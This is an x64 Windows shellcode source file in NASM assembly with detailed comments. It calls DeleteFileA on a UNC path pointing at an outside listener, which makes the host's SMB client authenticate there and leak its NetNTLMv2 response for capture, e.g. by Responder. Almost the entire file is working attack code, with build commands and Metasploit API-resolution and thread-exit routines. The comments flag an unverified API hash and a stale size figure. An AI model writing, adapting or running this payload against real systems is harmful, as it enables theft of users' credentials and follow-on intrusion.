NetNTLMv2 stealer shellcode (x64): forces the host's SMB client to authenticate to an attacker-controlled UNC path (e.g. a Responder listener) so its NetNTLMv2 response can be captured.
;-----------------------------------------------------------------------------;
; Author: Ege Balcı (egebalci[at]pm[dot]me)
; Compatible: All Windows versions with an SMBv1/SMBv2 client (outbound SMB to the listener must be reachable from the target)
; Architecture: x64
; Size: 265 + strlen(IP) + 1 bytes as written; recompute (e.g. `wc -c shellcode`) after any change to the code
; Build: nasm -f bin steal_netntlm_x64.asm -o shellcode && xxd -i shellcode
;-----------------------------------------------------------------------------;
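[BITS 64]
[ORG 0]
; Flow: align the stack, resolve the kernel32 export via the Metasploit block_api
; hash lookup, call it on a UNC path that points at the listener so the host's
; SMB client has to authenticate (NTLM) to it, then exit the thread.
; Register roles: rbp  = address of api_call, kept across every call below
;                 r10d = export hash consumed by api_call
;                 rcx  = first Win64 argument
  cld                          ; Clear the direction flag (block_api assumes it is clear).
  and rsp, ~0xF                ; Win64 ABI: RSP must be 16-byte aligned at every call. The
                               ; Metasploit x64 stagers do this before their first call; without
                               ; it a misaligned stack can crash inside the called API.
                               ; (4 bytes: 48 83 E4 F0 — add them to the size quoted in the header.)
  call start                   ; Pushes the address of the following api_call onto the stack.
%include "block_api.asm"       ; x64 variant: https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x64/src/block/block_api.asm
                               ; (the x86 block_api uses a different calling sequence and does not
                               ; fit the 'mov r10d, hash ; call rbp' convention used here)
start:
  pop rbp                      ; rbp = api_call; every Win32 call below is 'mov r10d, hash ; call rbp'.
  call get_api                 ; Pushes the address of the UNC string below as the return address.
  db "\\1.1.1.1\x",0           ; Listener (e.g. Responder) UNC path. NASM double-quoted strings take no
                               ; escapes, so the bytes really are \\1.1.1.1\x — keep the double
                               ; backslash and do not switch to backticks (which do process escapes).
                               ; NUL-terminated because the ANSI API below expects a C string.
get_api:
  pop rcx                      ; rcx = pointer to the UNC string (1st argument).
  mov r10d, 0x13DD2ED7         ; hash( "kernel32.dll", "DeleteFileA" ) — presumably; the original comment
                               ; said WinExec, which contradicts the call below. Verify the hash with the
                               ; Metasploit hash tool before relying on it.
  call rbp                     ; DeleteFileA("\\1.1.1.1\x"); the redirector must set up (and authenticate)
                               ; an SMB session to the listener just to look the path up, and that
                               ; session setup is what leaks the NetNTLMv2 response. The return value is
                               ; irrelevant and intentionally ignored.
                               ; NOTE(review): api_call reserves 32 bytes of shadow space that are not
                               ; reclaimed here; harmless because the code exits right after.
exitfunk:                      ; Metasploit x64 block_exitfunk: https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x64/src/block/block_exitfunk.asm
  mov ebx, 0x0A2A1DE0          ; EXITFUNK = hash( "kernel32.dll", "ExitThread" ): ends only this thread,
                               ; which is what you want when injected into a live process.
  mov r10d, 0x9DBD95A6         ; hash( "kernel32.dll", "GetVersion" )
  call rbp                     ; GetVersion(); AL = major version, AH = minor version.
  add rsp, 40                  ; Clean up the parameter space (value kept as in the MSF block).
  cmp al, byte 6               ; Major version below 6 (pre-Vista)?
  jl short goodbye             ; Then kernel32!ExitThread is safe to call directly.
  cmp bl, 0xE0                 ; On Vista/2008/7 and later, is the EXITFUNK kernel32!ExitThread?
  jne short goodbye            ; No: use the selected exit function as-is.
  mov ebx, 0x6F721347          ; Yes: substitute hash( "ntdll.dll", "RtlExitUserThread" ).
goodbye:                       ; Perform the actual call to the exit function.
  push byte 0                  ;
  pop rcx                      ; rcx = exit code 0.
  mov r10d, ebx                ; Hand the chosen EXITFUNK hash to api_call.
  call rbp                     ; EXITFUNK( 0 ); does not return.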